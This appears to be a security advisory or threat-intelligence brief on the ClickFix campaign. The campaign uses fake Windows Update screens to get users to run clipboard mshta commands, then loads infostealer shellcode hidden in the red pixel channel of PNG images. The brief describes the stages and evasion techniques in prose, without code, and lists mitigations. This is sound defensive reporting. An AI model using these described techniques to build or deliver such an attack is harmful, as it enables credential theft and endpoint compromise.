ClickFix Steganographic Malware Masquerades as Windows Update

The ClickFix campaign now delivers steganography-based malware through fake Windows Update screens that trick users into running mshta commands copied from their clipboard. On Windows systems, the lure imitates the native update UI in full-screen mode and instructs victims to open the Run dialog and execute a preloaded command, mapping to MITRE ATT&CK T1204 (User Execution), T1059 (Command and Scripting Interpreter), and T1105 (Ingress Tool Transfer). The mshta payload fetches a script that eventually loads shellcode embedded in PNG images, often dropping LummaC2 or Rhadamanthys infostealers into trusted processes like explorer.exe. The infection chain involves multiple stages: mshta.exe first retrieves an obfuscated JScript file from attacker infrastructure, which then runs PowerShell code laced with junk instructions to evade static analysis. PowerShell decrypts and loads a .NET assembly acting as a loader, which parses seemingly benign PNG images to extract hidden shellcode encoded in specific pixel color channels, especially the red channel. This custom steganography keeps malicious content off disk and concealed inside normal-looking images, significantly reducing detection rates by traditional scanners. For organizations, the impact is the silent compromise of endpoints used for banking, SaaS access, and remote work, enabling keylogging, credential theft, and lateral movement from unmanaged or under-monitored devices. Because ClickFix relies on urgent prompts and familiar UI patterns, it can bypass user awareness training that focuses only on phishing emails. Compromise may undermine MFA by stealing session tokens or cookies and can lead to data theft affecting GDPR, HIPAA, or PCI-DSS scope when infected endpoints handle regulated data. The campaign also highlights growing abuse of clipboard actions and browser-based prompts as a vector to coerce users into running commands. Mitigation requires blocking mshta.exe where possible, enforcing application control, and inspecting outbound traffic for suspicious script and image retrieval patterns from unknown domains. Security teams should educate users specifically about fake "security checks" and "update" pages that ask them to copy and paste commands, reinforce policies against running unverified scripts, and deploy EDR capable of detecting in-memory shellcode injections into explorer.exe and similar processes. Browser extensions or endpoint controls that block clipboard write attempts from websites can further reduce the success rate of ClickFix-style attacks.